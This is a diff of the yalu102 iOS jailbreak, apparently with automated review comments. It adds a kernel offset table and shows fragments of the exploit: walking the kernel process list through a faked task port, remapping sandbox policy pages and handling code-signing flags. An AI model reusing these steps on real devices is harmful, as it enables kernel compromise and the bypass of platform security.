 yalu102/jailbreak.h | 7 +
 yalu102/jailbreak.m | 30 +--
 yalu102/{devicesupport.h => mac_policy.h} | 42 +---
 yalu102/offsets.c | 103 ---------
 yalu102/offsets.h | 37 ---
 yalu102/patchfinder64.h | 42 +---
 14 files changed, 340 insertions(+), 322 deletions(-)
 create mode 100644 yalu102/Kernels.plist
 create mode 100644 yalu102/csflags.h
 delete mode 100644 yalu102/devicesupport.m
 create mode 100644 yalu102/jailbreak.h
 rename yalu102/{devicesupport.h => mac_policy.h} (89%)
 delete mode 100644 yalu102/offsets.c
 delete mode 100644 yalu102/offsets.h

diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj
index 339b0ba..bacd1e8 100644
--- a/yalu102.xcodeproj/project.pbxproj
+++ b/yalu102.xcodeproj/project.pbxproj
@@ -7,6 +7,8 @@
 objects = {
 
 /* Begin PBXBuildFile section */
+ A70DFA9E1E3D332500769FE9 /* include in Resources */ = {isa = PBXBuildFile; fileRef = A70DFA9D1E3D332500769FE9 /* include */; };
+ A70DFAA11E3D35AC00769FE9 /* Kernels.plist in Resources */ = {isa = PBXBuildFile; fileRef = A70DFAA01E3D35AC00769FE9 /* Kernels.plist */; };
 A72023721E3CFC2B00FADBFF /* IOKit.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = A72023711E3CFBCA00FADBFF /* IOKit.framework */; };
 EA1A3B9D1E391C4F009CA025 /* patchfinder64.o in Frameworks */ = {isa = PBXBuildFile; fileRef = EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */; };
 EA1A3BA81E398E33009CA025 /* 0.reload.plist in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BA61E398E33009CA025 /* 0.reload.plist */; };
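Review bot: The new `A70DFA9E1E3D332500769FE9 /* include in Resources */` build file turns the `include` folder reference into a bundle resource, and the later `@@ -201,7 +202,9 @@` hunk adds it to the Copy Bundle Resources phase; that folder holds the symlinks into the macOS SDK created by the build-phase script, so its contents would be copied into the app bundle at build time. If the folder is only meant to appear in the navigator, the PBXFileReference alone is enough and this PBXBuildFile entry plus the build-phase line should be dropped; if shipping the headers is intended, the commit message should say so.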
@@ -17,15 +19,18 @@
 EA9900EE1E1E9F060056FEBD /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9900ED1E1E9F060056FEBD /* ViewController.m */; };
 EA9900F11E1E9F060056FEBD /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = EA9900EF1E1E9F060056FEBD /* Main.storyboard */; };
 EA9900F61E1E9F060056FEBD /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = EA9900F41E1E9F060056FEBD /* LaunchScreen.storyboard */; };
- EA9901041E219C210056FEBD /* offsets.c in Sources */ = {isa = PBXBuildFile; fileRef = EA9901021E219C210056FEBD /* offsets.c */; };
 EA9901061E219FF10056FEBD /* bootstrap.tar in Resources */ = {isa = PBXBuildFile; fileRef = EA9901051E219FF10056FEBD /* bootstrap.tar */; };
 EA99010A1E21A04C0056FEBD /* tar in Resources */ = {isa = PBXBuildFile; fileRef = EA9901091E21A04C0056FEBD /* tar */; };
 EA99010C1E21A0520056FEBD /* launchctl in Resources */ = {isa = PBXBuildFile; fileRef = EA99010B1E21A0520056FEBD /* launchctl */; };
 EA99010E1E21A1560056FEBD /* jailbreak.m in Sources */ = {isa = PBXBuildFile; fileRef = EA99010D1E21A1560056FEBD /* jailbreak.m */; };
- EA9901171E21A1D90056FEBD /* devicesupport.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9901161E21A1D90056FEBD /* devicesupport.m */; };
 /* End PBXBuildFile section */
 
 /* Begin PBXFileReference section */
+ A70DFA9C1E3D314F00769FE9 /* jailbreak.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = jailbreak.h; sourceTree = ""; };
+ A70DFA9D1E3D332500769FE9 /* include */ = {isa = PBXFileReference; lastKnownFileType = folder; path = include; sourceTree = ""; };
+ A70DFA9F1E3D338B00769FE9 /* mac_policy.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = mac_policy.h; sourceTree = ""; };
+ A70DFAA01E3D35AC00769FE9 /* Kernels.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = Kernels.plist; sourceTree = ""; };
+ A70DFAA21E3D8FAF00769FE9 /* csflags.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = csflags.h; sourceTree = ""; };
 A72023711E3CFBCA00FADBFF /* IOKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = IOKit.framework; path = System/Library/Frameworks/IOKit.framework; sourceTree = SDKROOT; };
 A72023751E3CFE2E00FADBFF /* yalu102.xcconfig */ = {isa = PBXFileReference; lastKnownFileType = text.xcconfig; path = yalu102.xcconfig; sourceTree = ""; };
 EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = patchfinder64.h; sourceTree = ""; };
@@ -42,15 +47,10 @@
 EA9900F01E1E9F060056FEBD /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; };
 EA9900F51E1E9F060056FEBD /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = ""; };
 EA9900F71E1E9F060056FEBD /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; };
- EA9901021E219C210056FEBD /* offsets.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = offsets.c; sourceTree = ""; };
- EA9901031E219C210056FEBD /* offsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = offsets.h; sourceTree = ""; };
 EA9901051E219FF10056FEBD /* bootstrap.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; path = bootstrap.tar; sourceTree = ""; };
 EA9901091E21A04C0056FEBD /* tar */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = tar; sourceTree = ""; };
 EA99010B1E21A0520056FEBD /* launchctl */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = launchctl; sourceTree = ""; };
 EA99010D1E21A1560056FEBD /* jailbreak.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = jailbreak.m; sourceTree = ""; };
- EA99010F1E21A1A00056FEBD /* pte_stuff.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = pte_stuff.h; sourceTree = ""; };
- EA9901151E21A1D90056FEBD /* devicesupport.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = devicesupport.h; sourceTree = ""; };
- EA9901161E21A1D90056FEBD /* devicesupport.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = devicesupport.m; sourceTree = ""; };
 /* End PBXFileReference section */
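Review bot: The `EA99010F1E21A1A00056FEBD /* pte_stuff.h */` file reference is dropped here (and from the group in the next hunk) although jailbreak.m still contains `#import "pte_stuff.h"` as a context line of its `@@ -95,7 +89,7 @@` hunk and the diffstat lists no deletion of that file, so the header keeps being compiled but vanishes from the project navigator. Either keep the two pte_stuff.h references, or delete the file and move its contents into one of the remaining headers in the same commit.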
 /* Begin PBXFrameworksBuildPhase section */
@@ -107,6 +107,7 @@
 EA9900E51E1E9F060056FEBD /* yalu102 */ = {
 isa = PBXGroup;
 children = (
+ A70DFA9D1E3D332500769FE9 /* include */,
 EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */,
 A720236F1E3CFB3500FADBFF /* Resources */,
 EA9900E61E1E9F060056FEBD /* Supporting Files */,
@@ -114,17 +115,16 @@
 EA9900EF1E1E9F060056FEBD /* Main.storyboard */,
 EA9900E91E1E9F060056FEBD /* AppDelegate.h */,
 EA9900EA1E1E9F060056FEBD /* AppDelegate.m */,
- EA9901151E21A1D90056FEBD /* devicesupport.h */,
- EA9901161E21A1D90056FEBD /* devicesupport.m */,
+ A70DFAA21E3D8FAF00769FE9 /* csflags.h */,
 EA9900F71E1E9F060056FEBD /* Info.plist */,
- EA99010D1E21A1560056FEBD /* jailbreak.m */,
- EA9901021E219C210056FEBD /* offsets.c */,
- EA9901031E219C210056FEBD /* offsets.h */,
+ A70DFAA01E3D35AC00769FE9 /* Kernels.plist */,
+ A70DFA9F1E3D338B00769FE9 /* mac_policy.h */,
 EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */,
 EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */,
- EA99010F1E21A1A00056FEBD /* pte_stuff.h */,
 EA9900EC1E1E9F060056FEBD /* ViewController.h */,
 EA9900ED1E1E9F060056FEBD /* ViewController.m */,
+ A70DFA9C1E3D314F00769FE9 /* jailbreak.h */,
+ EA99010D1E21A1560056FEBD /* jailbreak.m */,
 );
 path = yalu102;
 sourceTree = "";
@@ -169,7 +169,7 @@
 TargetAttributes = {
 EA9900E21E1E9F060056FEBD = {
 CreatedOnToolsVersion = 8.2.1;
+ DevelopmentTeam = N3S4C3QL65;
 ProvisioningStyle = Automatic;
 };
 };
@@ -201,7 +202,9 @@
 EA9901061E219FF10056FEBD /* bootstrap.tar in Resources */,
 EA1A3BA81E398E33009CA025 /* 0.reload.plist in Resources */,
 EA9900F61E1E9F060056FEBD /* LaunchScreen.storyboard in Resources */,
+ A70DFAA11E3D35AC00769FE9 /* Kernels.plist in Resources */,
 EA1A3BAD1E399006009CA025 /* reload in Resources */,
+ A70DFA9E1E3D332500769FE9 /* include in Resources */,
 EA1A3BC51E39D1FF009CA025 /* Assets.xcassets in Resources */,
 EA9900F11E1E9F060056FEBD /* Main.storyboard in Resources */,
 );
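Review bot: `DevelopmentTeam = N3S4C3QL65;` in the `@@ -169,7 +169,7 @@` hunk puts a personal signing team back into the shared project file one commit after "Clear automated code signing settings" removed `CGTX3WH3ZS`, so every other contributor either gets a signing failure or ends up re-diffing this line. Leave the TargetAttributes entry absent and set `DEVELOPMENT_TEAM` in the `yalu102.xcconfig` the project already references, or in a local git-ignored xcconfig, so the team is chosen per machine.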
@@ -231,8 +234,6 @@
 isa = PBXSourcesBuildPhase;
 buildActionMask = 2147483647;
 files = (
- EA9901041E219C210056FEBD /* offsets.c in Sources */,
- EA9901171E21A1D90056FEBD /* devicesupport.m in Sources */,
 EA9900EE1E1E9F060056FEBD /* ViewController.m in Sources */,
 EA9900EB1E1E9F060056FEBD /* AppDelegate.m in Sources */,
 EA99010E1E21A1560056FEBD /* jailbreak.m in Sources */,
diff --git a/yalu102/AppDelegate.h b/yalu102/AppDelegate.h
index ccd8022..b641ee4 100644
--- a/yalu102/AppDelegate.h
+++ b/yalu102/AppDelegate.h
@@ -12,6 +12,4 @@
 @property (strong, nonatomic) UIWindow *window; - @end -
diff --git a/yalu102/AppDelegate.m b/yalu102/AppDelegate.m
index 8dfdc30..8807e94 100644
--- a/yalu102/AppDelegate.m
+++ b/yalu102/AppDelegate.m
@@ -14,38 +14,31 @@ @interface AppDelegate () @implementation AppDelegate - - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { // Override point for customization after application launch. return YES; } - - (void)applicationWillResignActive:(UIApplication *)application { // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. } - - (void)applicationDidEnterBackground:(UIApplication *)application { // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. } - - (void)applicationWillEnterForeground:(UIApplication *)application { // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. } - - (void)applicationDidBecomeActive:(UIApplication *)application { // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. } - - (void)applicationWillTerminate:(UIApplication *)application { // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. } - @end diff --git a/yalu102/Kernels.plist b/yalu102/Kernels.plist new file mode 100644 index 0000000..0e8413f --- /dev/null 
+++ b/yalu102/Kernels.plist 
@@ -0,0 +1,260 @@ + + + + + + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T8010 + + allproc + 0x5EC178 + proc + 0x360 + rootvnode + 0x5F20B8 + + + + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7001 + + allproc + 0x5B0228 + proc + 0x360 + rootvnode + 0x5B60B8 + + + + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7000 + + allproc + 0x5b0168 + proc + 0x360 + rootvnode + 0x5b60b8 + + + + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S8000 + + allproc + 0x5a4148 + proc + 0x360 + rootvnode + 0x5aa0b8 + + + + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S5L8960X + + allproc + 0x5a4128 + proc + 0x360 + rootvnode + 0x5aa0b8 + + + + Darwin Kernel Version 16.0.0: Fri Aug 5 22:15:30 PDT 2016; root:xnu-3789.1.24~11/RELEASE_ARM64_S5L8960X + + allproc + 0x5a4128 + proc + 0x360 + rootvnode + 0x5aa0b8 + + + + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000 + + allproc + 0x5A4148 + proc + 0x360 + rootvnode + 0x5AA0B8 + + + + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S8000 + + allproc + 0x5A8438 + proc + 0x360 + rootvnode + 0x5AE0B8 + + + + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7000 + + allproc + 0x5B8468 + proc + 0x360 + rootvnode + 0x5BE0b8 + + + + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S5L8960X + + allproc + 0x5AC418 + proc + 0x360 + rootvnode + 0x5B20B8 + + + + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010 + + allproc + 0x5EC478 + proc + 0x360 + rootvnode + 0x5F20B8 + + + + Darwin Kernel Version 16.1.0: Thu Sep 29 22:13:19 PDT 2016; 
root:xnu-3789.23.3~2/RELEASE_ARM64_T7000 + + allproc + 0x5B8168 + proc + 0x360 + rootvnode + 0x5BA0B8 + + + + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:10 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T8010 + + allproc + 0x5EC178 + proc + 0x360 + rootvnode + 0x5F20B8 + + + + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7001 + + allproc + 0x5B4228 + proc + 0x360 + rootvnode + 0x5BA0B8 + + + + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7000 + + allproc + 0x5B4168 + proc + 0x360 + rootvnode + 0x5BA0B8 + + + + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000 + + allproc + 0x5A4148 + proc + 0x360 + rootvnode + 0x5AA0B8 + + + + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S5L8960X + + allproc + 0x5A4128 + proc + 0x360 + rootvnode + 0x5AA0B8 + + + diff --git a/yalu102/Resources/reload b/yalu102/Resources/reload index 77afe86..0c97826 100755 --- a/yalu102/Resources/reload +++ b/yalu102/Resources/reload @@ -6,5 +6,4 @@ launchctl load /System/Library/LaunchDaemons/com.apple.logd.plist sleep 1 launchctl load /Library/LaunchDaemons launchctl load /System/Library/LaunchDaemons - exit 0 diff --git a/yalu102/ViewController.m b/yalu102/ViewController.m index 63328b3..ffe1fea 100644 --- a/yalu102/ViewController.m +++ b/yalu102/ViewController.m @@ -6,14 +6,12 @@ // Copyright © 2017 kimjongcracks. All rights reserved. // -#import "offsets.h" #import "ViewController.h" #import #import #import -#undef __IPHONE_OS_VERSION_MIN_REQUIRED #import -#include +#import extern uint64_t procoff; 
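Review bot: Kernels.plist carries no comment explaining its keys, and the markup is lost in this view, so a reader can only guess from the names: the top-level keys are full kernel version strings and each entry holds `allproc`, `proc` and `rootvnode`. `allproc` is added to `kernel_base` in ViewController.m (`uint64_t allproc = allproc_offset + kernel_base;`), so it is an unslid offset; what `proc` (0x360 in every entry) and `rootvnode` are relative to is not visible in this diff. A leading comment such as `<!-- keyed by the exact uname version string; allproc/rootvnode: offsets from the kernel base; proc: <fill in> -->` would keep the table maintainable, and the mixed hex case between entries (`0x5b0168` vs `0x5B0228`) is worth normalising unless the loader is known to parse with base 0.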
@@ -32,17 +30,16 @@ @implementation ViewController - (void)viewDidLoad { [super viewDidLoad]; + init_offsets(); + struct utsname u = { 0 }; uname(&u); - if (strstr(u.version, "MarijuanARM")) { [dope setEnabled:NO]; [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; } - - // Do any additional setup after loading the view, typically from a nib. } typedef natural_t not_natural_t; @@ -305,8 +302,7 @@ - (IBAction)yolo:(UIButton*)sender uint64_t allproc = allproc_offset + kernel_base; uint64_t proc_ = allproc; - - uint64_t myproc = 0; + uint64_t kernproc = 0; while (proc_) { @@ -321,15 +317,13 @@ - (IBAction)yolo:(UIButton*)sender *(uint64_t*) (faketask + procoff) = proc; pid_for_task(foundport, &pd); - if (pd == getpid()) { - myproc = proc; - } else if (pd == 0){ + if (pd == 0){ kernproc = proc; } + proc_ = proc; } - uint64_t kern_task = 0; *(uint64_t*) (faketask + procoff) = kernproc - 0x10 + 0x18; pid_for_task(foundport, (int32_t*)&kern_task); @@ -371,8 +365,9 @@ - (IBAction)yolo:(UIButton*)sender extern uint64_t slide; slide = kernel_base - 0xFFFFFFF007004000; - void exploit(void*, mach_port_t, uint64_t, uint64_t); - exploit(sender, pt, kernel_base, allproc_offset); + void yalu_jailbreak(mach_port_t, uint64_t, uint64_t); + exploit(pt, kernel_base, allproc_offset); + [dope setEnabled:NO]; [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; @@ -383,5 +378,4 @@ - (void)didReceiveMemoryWarning { // Dispose of any resources that can be recreated. } - @end diff --git a/yalu102/csflags.h b/yalu102/csflags.h new file mode 100644 index 0000000..d06e7a5 --- /dev/null +++ b/yalu102/csflags.h 
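Review bot: The result of the `init_offsets();` call added to `viewDidLoad` is discarded, and nothing in the hunk disables the button when the running kernel is not listed in Kernels.plist; the `constload()` removed from devicesupport.m at least returned `-1` for an unknown version. Unless init_offsets aborts on its own (its definition is not in this diff), `yolo:` later computes `allproc_offset + kernel_base` from whatever the failed lookup left behind. If it reports a status, check it here and reuse the existing disabled-button branch: `if (init_offsets() != 0) { [dope setEnabled:NO]; [dope setTitle:@"unsupported kernel" forState:UIControlStateDisabled]; }` (title text is a placeholder).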
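Review bot: In the `@@ -371,8 +365,9 @@` hunk the local prototype becomes `void yalu_jailbreak(mach_port_t, uint64_t, uint64_t);` while the call on the next line is `exploit(pt, kernel_base, allproc_offset);`, so the declaration is dead and the call compiles only through the prototype from the header newly imported at the top of the file (presumably jailbreak.h, whose name is lost in this view). Delete the local prototype; if a rename is intended, rename the definition in jailbreak.m, the declaration in jailbreak.h and this call in one step. The enclosing `yolo:` method starts and ends outside the hunk.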
@@ -0,0 +1,26 @@ + +#pragma once + +#define CS_VALID 0x0000001 /* dynamically valid */ +#define CS_ADHOC 0x0000002 /* ad hoc signed */ +#define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ +#define CS_INSTALLER 0x0000008 /* has installer entitlement */ +#define CS_HARD 0x0000100 /* don't load invalid pages */ +#define CS_KILL 0x0000200 /* kill process if it becomes invalid */ +#define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ +#define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ +#define CS_ENFORCEMENT 0x0001000 /* require enforcement */ +#define CS_REQUIRE_LV 0x0002000 /* require library validation */ +#define CS_ENTITLEMENTS_VALIDATED 0x0004000 + +#define CS_ALLOWED_MACHO 0x00ffffe + +#define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ +#define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ +#define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ +#define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ + +#define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ +#define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ +#define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ +#define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */ diff --git a/yalu102/devicesupport.m b/yalu102/devicesupport.m deleted file mode 100644 index 7748444..0000000 --- a/yalu102/devicesupport.m +++ /dev/null 
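Review bot: csflags.h has no provenance comment; the values appear to be the kernel's `CS_*` code-signing flag definitions, and without a note on their origin nobody can tell when they drift from the SDK they were copied from. Add a first line such as `/* CS_* flags copied from xnu bsd/sys/codesign.h (xnu version: <fill in>); keep in sync */` and drop the stray blank line before `#pragma once`.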
@@ -1,50 +0,0 @@ -#import -#import "devicesupport.h" -#import -#import - - -NSMutableArray* consttable = nil; -NSMutableArray* collide = nil; -int constload() { - struct utsname uts; - uname(&uts); - if (strstr(uts.version, "Marijuan")) { - return -2; - } - - NSString* strv = [NSString stringWithUTF8String:uts.version]; - NSArray *dp =[[NSArray alloc] initWithContentsOfFile: [[NSBundle mainBundle] pathForResource: @"def" ofType:@"plist"]]; - int m = 0; - collide = [NSMutableArray new]; - - for (NSDictionary* dict in dp) { - if ([dict[@"vers"] isEqualToString:strv]) { - [collide setObject:[NSMutableArray new] atIndexedSubscript:m]; - int i = 0; - for (NSString* str in dict[@"val"]) { - [collide[m] setObject:[NSNumber numberWithUnsignedLongLong:strtoull([str UTF8String], 0, 0)] atIndexedSubscript:i]; - i++; - } - m++; - } - } - if (m) { - return 0; - } - return -1; -} -char affine_const_by_surfacevt(uint64_t surfacevt_slid) -{ - for (NSArray* arr in collide) { - if ((surfacevt_slid & (0xfffff)) == ([[arr objectAtIndex:1] unsignedLongLongValue] & 0xfffff)) { - NSLog(@"affined"); - consttable = arr; - return 0; - } - } - return -1; -} -uint64_t constget(int idx){ - return [[consttable objectAtIndex:idx] unsignedLongLongValue]; -} diff --git a/yalu102/jailbreak.h b/yalu102/jailbreak.h new file mode 100644 index 0000000..0e0f23c --- /dev/null +++ b/yalu102/jailbreak.h @@ -0,0 +1,7 @@ + +#pragma once + +#import +#import + +void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs); diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index 64da483..85f0ac9 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m 
@@ -6,35 +6,29 @@ // Copyright © 2017 kimjongcracks. All rights reserved. // +#import "jailbreak.h" #import -#undef __IPHONE_OS_VERSION_MIN_REQUIRED -#import -#import "devicesupport.h" - #import #import #import -#import #import -#import - -#import "devicesupport.h" -#import #import #import -#import +#import #import #import #import - +#import +#import +#import +#import "mac_policy.h" #import "patchfinder64.h" - -#define vm_address_t mach_vm_address_t +#import "csflags.h" mach_port_t tfp0=0; uint64_t slide=0; io_connect_t funcconn=0; -// #define NSLog(...) + kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize); kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt); kern_return_t mach_vm_protect(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection); @@ -95,7 +89,7 @@ uint64_t WriteAnywhere32(uint64_t addr, uint32_t val) { #import "pte_stuff.h" -void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) +void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) { io_iterator_t iterator; IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"), &iterator); @@ -558,8 +552,7 @@ void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) uint64_t sbops_end = sbops + sizeof(struct mac_policy_ops); uint64_t nopag = sbops_end - sbops; - - int ctr = 0; + for (int i = 0; i < nopag; i+= PSZ) { RemapPage(((sbops + i) & (~PMK))); } @@ -616,7 +609,6 @@ void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) uint64_t nopag = sbops_end - sbops; - int ctr = 0; for (int i = 0; i < nopag; i+= PSZ) { RemapPage(((sbops + i) & (~PMK))); } 
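Review bot: Dropping `#define vm_address_t mach_vm_address_t` changes the type of every `vm_address_t` declared after this point, including the `vm_address_t kppsh` that a later hunk of this file on this page passes by address to `mach_vm_allocate()`, whose parameter is `mach_vm_address_t *`; the two are the same width on arm64 but are distinct pointer types, so either check the build for new incompatible-pointer warnings or declare such locals as `mach_vm_address_t kppsh = 0;`. The hand-written `kern_return_t mach_vm_read_overwrite/mach_vm_write/mach_vm_protect` prototypes kept below the includes are the kind of declaration that drifts from the real interface; collecting them in one shared header (as a later patch on this page does) is preferable. The -95 hunk removes the `btn` parameter from `exploit()`; its caller is not in this view, so confirm it was updated in the same commit. The bodies touched by the remaining hunks begin outside them.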
@@ -784,8 +776,8 @@ void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) chmod("/Library/LaunchDaemons/0.reload.plist", 0644); chown("/Library/LaunchDaemons/0.reload.plist", 0, 0); } - unlink("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist"); + //unlink("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist"); } } chmod("/private", 0777); diff --git a/yalu102/devicesupport.h b/yalu102/mac_policy.h similarity index 89% rename from yalu102/devicesupport.h rename to yalu102/mac_policy.h index 97bcf09..d5c7ece 100644 --- a/yalu102/devicesupport.h +++ b/yalu102/mac_policy.h 
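Review bot: The `unlink()` of `com.apple.mobile.softwareupdated.plist` is commented out rather than removed, and nothing records why it was disabled or whether it is meant to return; commented-out code tends to be re-enabled by accident, so either delete the line (history keeps it) or replace it with a short comment such as `// softwareupdated's launchd plist is deliberately left in place -- TODO record the reason`. The enclosing function `exploit` begins outside this hunk.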
@@ -1,41 +1,9 @@ -#ifndef devicesupport_h -#define devicesupport_h +#pragma once - -//0xFFFFFFF0075F6000+0x50 (0xfffffff006e4d620+0x4bc0) - -#define G(type) constget(type) -#define S(type, val) constset(type,val) - -#define CS_VALID 0x0000001 /* dynamically valid */ -#define CS_ADHOC 0x0000002 /* ad hoc signed */ -#define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ -#define CS_INSTALLER 0x0000008 /* has installer entitlement */ - -#define CS_HARD 0x0000100 /* don't load invalid pages */ -#define CS_KILL 0x0000200 /* kill process if it becomes invalid */ -#define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ -#define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ -#define CS_ENFORCEMENT 0x0001000 /* require enforcement */ -#define CS_REQUIRE_LV 0x0002000 /* require library validation */ -#define CS_ENTITLEMENTS_VALIDATED 0x0004000 - -#define CS_ALLOWED_MACHO 0x00ffffe - -#define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ -#define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ -#define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ -#define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ - -#define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ -#define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ -#define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ -#define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */ - -uint64_t constget(int idx); #import -struct mac_policy_ops{ + +struct mac_policy_ops { uint64_t mpo_audit_check_postselect; uint64_t mpo_audit_check_preselect; uint64_t mpo_bpfdesc_label_associate; @@ -372,7 +340,3 @@ struct mac_policy_ops{ uint64_t mpo_iokit_check_filter_properties; uint64_t mpo_iokit_check_get_property; }; - - - -#endif /* devicesupport_h */ 
